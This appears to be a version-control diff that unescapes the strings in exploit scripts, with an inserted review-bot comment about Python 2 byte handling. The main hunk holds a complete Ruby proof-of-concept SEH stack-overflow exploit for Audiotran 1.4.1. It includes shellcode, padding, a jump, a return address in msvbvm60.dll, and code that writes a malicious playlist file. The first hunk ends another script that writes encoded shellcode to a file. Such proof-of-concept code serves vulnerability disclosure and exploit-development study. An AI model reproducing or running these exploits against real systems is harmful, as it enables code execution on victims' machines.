"\x4f\x49\x45\x4f\x4b\x4c\x30\x4f\x45\x4f\x52\x50\x56\x42\x48"
|
||||
"\x49\x36\x4c\x55\x4f\x4d\x4d\x4d\x4b\x4f\x4e\x35\x47\x4c\x43"
|
||||
"\x36\x43\x4c\x44\x4a\x4d\x50\x4b\x4b\x4d\x30\x43\x45\x45\x55"
|
||||
"\x4f\x4b\x50\x47\x44\x53\x44\x32\x42\x4f\x42\x4a\x45\x50\x46"
|
||||
"\x33\x4b\x4f\x4e\x35\x44\x4a\x41\x41")
|
||||
|
||||
|
||||
FILE = open(outputfile, \\\\\\\"w\\\\\\\")
|
||||
FILE = open(outputfile, "w")
|
||||
FILE.write(shellcode)
|
||||
FILE.close()
|
|
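Review bot: the removed lines carry seven levels of backslash escaping (`\\\\\\\"`), which shows this file had been re-escaped on every round-trip through the database; the added lines are the valid Python 2 source again. One caveat worth stating in the commit message: `open(outputfile, "w")` followed by `FILE.write(shellcode)` relies on Python 2 `str` being a byte string. Under Python 3 the same code would write UTF-8 text, expanding any byte above 0x7f (for example `\x89\xe5\xda` at the start of the encoded payload) into two bytes and shifting every offset, so the unescaped file should not be described as validated unless it was run under Python 2. The `"CAFE"*8` line is consistent with its `# 32 Byte NOP Sled` comment (4 bytes times 8).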
@ -10,59 +10,59 @@
|
|||
# Type of vuln : Stack Overflow / SEH
|
||||
# Greetz to : Corelan Team::corelanc0d3r/EdiStrosar/Rick2600/MarkoT/mr_me
|
||||
#
|
||||
# Script provided \\\'as is\\\', without any warranty.
|
||||
# Script provided 'as is', without any warranty.
|
||||
# Use for educational purposes only.
|
||||
#
|
||||
#
|
||||
#
|
||||
|
||||
banner =
|
||||
\\\"|------------------------------------------------------------------|\\\\n\\\" +
|
||||
\\\"| __ __ |\\\\n\\\" +
|
||||
\\\"| _________ ________ / /___ _____ / /____ ____ _____ ___ |\\\\n\\\" +
|
||||
\\\"| / ___/ __ \\\\\\\\/ ___/ _ \\\\\\\\/ / __ `/ __ \\\\\\\\ / __/ _ \\\\\\\\/ __ `/ __ `__ \\\\\\\\ |\\\\n\\\" +
|
||||
\\\"| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |\\\\n\\\" +
|
||||
\\\"| \\\\\\\\___/\\\\\\\\____/_/ \\\\\\\\___/_/\\\\\\\\__,_/_/ /_/ \\\\\\\\__/\\\\\\\\___/\\\\\\\\__,_/_/ /_/ /_/ |\\\\n\\\" +
|
||||
\\\"| |\\\\n\\\" +
|
||||
\\\"| http://www.corelan.be:8800 |\\\\n\\\" +
|
||||
\\\"| |\\\\n\\\" +
|
||||
\\\"|-------------------------------------------------[ EIP Hunters ]--|\\\\n\\\\n\\\"
|
||||
"|------------------------------------------------------------------|\n" +
|
||||
"| __ __ |\n" +
|
||||
"| _________ ________ / /___ _____ / /____ ____ _____ ___ |\n" +
|
||||
"| / ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\ / __/ _ \\/ __ `/ __ `__ \\ |\n" +
|
||||
"| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |\n" +
|
||||
"| \\___/\\____/_/ \\___/_/\\__,_/_/ /_/ \\__/\\___/\\__,_/_/ /_/ /_/ |\n" +
|
||||
"| |\n" +
|
||||
"| http://www.corelan.be:8800 |\n" +
|
||||
"| |\n" +
|
||||
"|-------------------------------------------------[ EIP Hunters ]--|\n\n"
|
||||
|
||||
# Corelan Team MsgBox
|
||||
payload =
|
||||
\\\"\\\\xeb\\\\x22\\\\x56\\\\x31\\\\xc0\\\\x64\\\\x8b\\\\x40\\\\x30\\\\x85\\\\xc0\\\\x78\\\" +
|
||||
\\\"\\\\x0c\\\\x8b\\\\x40\\\\x0c\\\\x8b\\\\x70\\\\x1c\\\\xad\\\\x8b\\\\x40\\\\x08\\\\xeb\\\" +
|
||||
\\\"\\\\x09\\\\x8b\\\\x40\\\\x34\\\\x8d\\\\x40\\\\x7c\\\\x8b\\\\x40\\\\x3c\\\\x5e\\\\xc3\\\" +
|
||||
\\\"\\\\xeb\\\\x69\\\\x60\\\\x8b\\\\x6c\\\\x24\\\\x24\\\\x8b\\\\x45\\\\x3c\\\\x8b\\\\x54\\\" +
|
||||
\\\"\\\\x05\\\\x78\\\\x01\\\\xea\\\\x8b\\\\x4a\\\\x18\\\\x8b\\\\x5a\\\\x20\\\\x01\\\\xeb\\\" +
|
||||
\\\"\\\\xe3\\\\x34\\\\x49\\\\x8b\\\\x34\\\\x8b\\\\x01\\\\xee\\\\x31\\\\xff\\\\x31\\\\xc0\\\" +
|
||||
\\\"\\\\xfc\\\\xac\\\\x84\\\\xc0\\\\x74\\\\x07\\\\xc1\\\\xcf\\\\x0d\\\\x01\\\\xc7\\\\xeb\\\" +
|
||||
\\\"\\\\xf4\\\\x3b\\\\x7c\\\\x24\\\\x28\\\\x75\\\\xe1\\\\x8b\\\\x5a\\\\x24\\\\x01\\\\xeb\\\" +
|
||||
\\\"\\\\x66\\\\x8b\\\\x0c\\\\x4b\\\\x8b\\\\x5a\\\\x1c\\\\x01\\\\xeb\\\\x8b\\\\x04\\\\x8b\\\" +
|
||||
\\\"\\\\x01\\\\xe8\\\\x89\\\\x44\\\\x24\\\\x1c\\\\x61\\\\xc3\\\\xad\\\\x50\\\\x52\\\\xe8\\\" +
|
||||
\\\"\\\\xaa\\\\xff\\\\xff\\\\xff\\\\x89\\\\x07\\\\x44\\\\x44\\\\x44\\\\x44\\\\x44\\\\x44\\\" +
|
||||
\\\"\\\\x44\\\\x44\\\\x47\\\\x47\\\\x47\\\\x47\\\\x39\\\\xce\\\\x75\\\\xe6\\\\xc3\\\\x4c\\\" +
|
||||
\\\"\\\\x4c\\\\x4c\\\\x4c\\\\x89\\\\xe5\\\\xe8\\\\x68\\\\xff\\\\xff\\\\xff\\\\x89\\\\xc2\\\" +
|
||||
\\\"\\\\xeb\\\\x1c\\\\x5e\\\\x8d\\\\x7d\\\\x04\\\\x89\\\\xf1\\\\x80\\\\xc1\\\\x0c\\\\xe8\\\" +
|
||||
\\\"\\\\xc8\\\\xff\\\\xff\\\\xff\\\\xeb\\\\x15\\\\x31\\\\xd2\\\\x59\\\\x88\\\\x51\\\\x36\\\" +
|
||||
\\\"\\\\x51\\\\x52\\\\xff\\\\x54\\\\x24\\\\x0c\\\\xe8\\\\xdf\\\\xff\\\\xff\\\\xff\\\\x57\\\" +
|
||||
\\\"\\\\x7f\\\\x29\\\\x62\\\\xe8\\\\xe6\\\\xff\\\\xff\\\\xff\\\\x43\\\\x6f\\\\x72\\\\x65\\\" +
|
||||
\\\"\\\\x6c\\\\x61\\\\x6e\\\\x20\\\\x54\\\\x65\\\\x61\\\\x6d\\\\x20\\\\x53\\\\x68\\\\x65\\\" +
|
||||
\\\"\\\\x6c\\\\x6c\\\\x63\\\\x6f\\\\x64\\\\x65\\\\x20\\\\x2d\\\\x20\\\\x50\\\\x72\\\\x6f\\\" +
|
||||
\\\"\\\\x67\\\\x72\\\\x61\\\\x6d\\\\x20\\\\x65\\\\x78\\\\x70\\\\x6c\\\\x6f\\\\x69\\\\x74\\\" +
|
||||
\\\"\\\\x65\\\\x64\\\\x20\\\\x73\\\\x75\\\\x63\\\\x65\\\\x73\\\\x73\\\\x66\\\\x75\\\\x6c\\\" +
|
||||
\\\"\\\\x6c\\\\x79\\\\x58\\\"
|
||||
"\xeb\x22\x56\x31\xc0\x64\x8b\x40\x30\x85\xc0\x78" +
|
||||
"\x0c\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40\x08\xeb" +
|
||||
"\x09\x8b\x40\x34\x8d\x40\x7c\x8b\x40\x3c\x5e\xc3" +
|
||||
"\xeb\x69\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54" +
|
||||
"\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb" +
|
||||
"\xe3\x34\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0" +
|
||||
"\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb" +
|
||||
"\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x01\xeb" +
|
||||
"\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b" +
|
||||
"\x01\xe8\x89\x44\x24\x1c\x61\xc3\xad\x50\x52\xe8" +
|
||||
"\xaa\xff\xff\xff\x89\x07\x44\x44\x44\x44\x44\x44" +
|
||||
"\x44\x44\x47\x47\x47\x47\x39\xce\x75\xe6\xc3\x4c" +
|
||||
"\x4c\x4c\x4c\x89\xe5\xe8\x68\xff\xff\xff\x89\xc2" +
|
||||
"\xeb\x1c\x5e\x8d\x7d\x04\x89\xf1\x80\xc1\x0c\xe8" +
|
||||
"\xc8\xff\xff\xff\xeb\x15\x31\xd2\x59\x88\x51\x36" +
|
||||
"\x51\x52\xff\x54\x24\x0c\xe8\xdf\xff\xff\xff\x57" +
|
||||
"\x7f\x29\x62\xe8\xe6\xff\xff\xff\x43\x6f\x72\x65" +
|
||||
"\x6c\x61\x6e\x20\x54\x65\x61\x6d\x20\x53\x68\x65" +
|
||||
"\x6c\x6c\x63\x6f\x64\x65\x20\x2d\x20\x50\x72\x6f" +
|
||||
"\x67\x72\x61\x6d\x20\x65\x78\x70\x6c\x6f\x69\x74" +
|
||||
"\x65\x64\x20\x73\x75\x63\x65\x73\x73\x66\x75\x6c" +
|
||||
"\x6c\x79\x58"
|
||||
|
||||
print banner
|
||||
puts \\\"[+] Exploit for Audiotran 1.4.1.\\\"
|
||||
puts "[+] Exploit for Audiotran 1.4.1."
|
||||
|
||||
filename = \\\"audiotran_poc.pls\\\"
|
||||
f = File.new(filename, \\\'w\\\')
|
||||
f.write \\\'A\\\' * 1308 #padding
|
||||
f.write \\\"\\\\xeb\\\\x06\\\\x90\\\\x90\\\"
|
||||
f.write \\\"\\\\xcb\\\\x75\\\\x52\\\\x73\\\" # ret at 0x735275CB [msvbvm60.dll]
|
||||
filename = "audiotran_poc.pls"
|
||||
f = File.new(filename, 'w')
|
||||
f.write 'A' * 1308 #padding
|
||||
f.write "\xeb\x06\x90\x90"
|
||||
f.write "\xcb\x75\x52\x73" # ret at 0x735275CB [msvbvm60.dll]
|
||||
f.write payload
|
||||
f.write \\\'A\\\' * 9000 # padding
|
||||
f.write 'A' * 9000 # padding
|
||||
f.close
|
||||
|
||||
puts \\\"[+] Wrote exploit file : #(unknown).\\\"
|
||||
puts "[+] Wrote exploit file : #(unknown)."
|